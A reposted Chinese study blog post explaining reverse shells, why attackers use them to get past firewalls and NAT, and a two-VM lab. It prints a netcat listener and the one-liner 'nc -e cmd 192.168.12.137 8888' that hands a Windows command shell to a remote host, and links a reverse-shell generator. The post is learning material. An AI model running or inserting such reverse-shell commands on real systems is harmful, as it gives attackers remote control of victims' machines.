搜索

反弹shell


发布时间: 2022-11-24 17:45:01    浏览次数:9 次

参考文章:https://cloud.tencent.com/developer/article/1818091

一些概念

原理:

反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。

将权限从一个地方移植到另外一个地方

正向连接:

攻击者在自己的机器上去连接目标主机。远程桌面、web服务、ssh、telnet等等都是正向连接

反向连接:

目标主机去主动连接攻击者自己的主机(受害者主机主动找攻击者主机)

为什么需要反弹shell?

解决数据回显和数据通信这两个问题
数据回显
打个比方,我去利用工具去让服务器执行一条命令,但是我不知道我这个命令到底有没有被执行成功。在渗透测试的绝大部分环境中,是没有数据回显的。我去执行一条下载命令,它可能是不会提醒我说文件下载成功。
数据通信
对于一些交互式命令,我输入一条命令,它会回复我下一步该输啥,但是我可能面临看不见它回复啥的问题。

反弹shell的适用情况:

  • 目标机因防火墙受限,目标机器只能发送请求,不能接收请求

上课时老师提过,一般而言防火墙的入站规则比较严格,不能随便允许外人进入/访问,但是它的出站规则比较简单,一般比较宽松。可以联想一下小兔子乖乖把门开开的故事来理解

  • 目标机端口被占用
  • 目标机位于局域网,或IP会动态变化,攻击机无法直接连接

举个例子,内外网,在内网中会有n台设备共同使用一个ip地址(公网ip)作为数据流量的出口,我可以在内网中去输入外网服务器的ip访问外网中的服务器,但是外网的服务器却无法通过我内网出口的这个ip地址去找到我这台机器,因为这个ip地址下有n台设备共用这个ip地址。

  • 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知的

2,3,4不能理解,日后再说

实战

反弹shell的实现方式有很多,可以因地制宜进行操作。具体可以参考最上面的文章。
介绍一个工具,可以帮助我们生成反弹shell命令
https://forum.ywhack.com/reverse-shell/
image

使用的两台机器分别为ubuntu,和win10,都运行在虚拟机中,处于同一个内网中。
1.在ubuntu中主机中监听8888端口
nc -lvnp 8888
image
2.查看ubuntu主机的ip地址
ifconfig
image
3.在win10主机中将cmd命令权限移交给ubuntu主机
nc -e cmd 192.168.12.137 8888
image
4.回到我们的ubuntu主机,看看它监听到没有
image
看来是监听到了
5.在ubuntu主机中输入ipconfig命令,看一看win10主机的ip地址信息
image
image
6.实验结束

免责声明 反弹shell,资源类别:文本, 浏览次数:9 次, 文件大小:-- , 由本站蜘蛛搜索收录2022-11-24 05:45:01。此页面由程序自动采集,只作交流和学习使用,本站不储存任何资源文件,如有侵权内容请联系我们举报删除, 感谢您对本站的支持。 原文链接:https://www.cnblogs.com/xjy881/p/16640879.html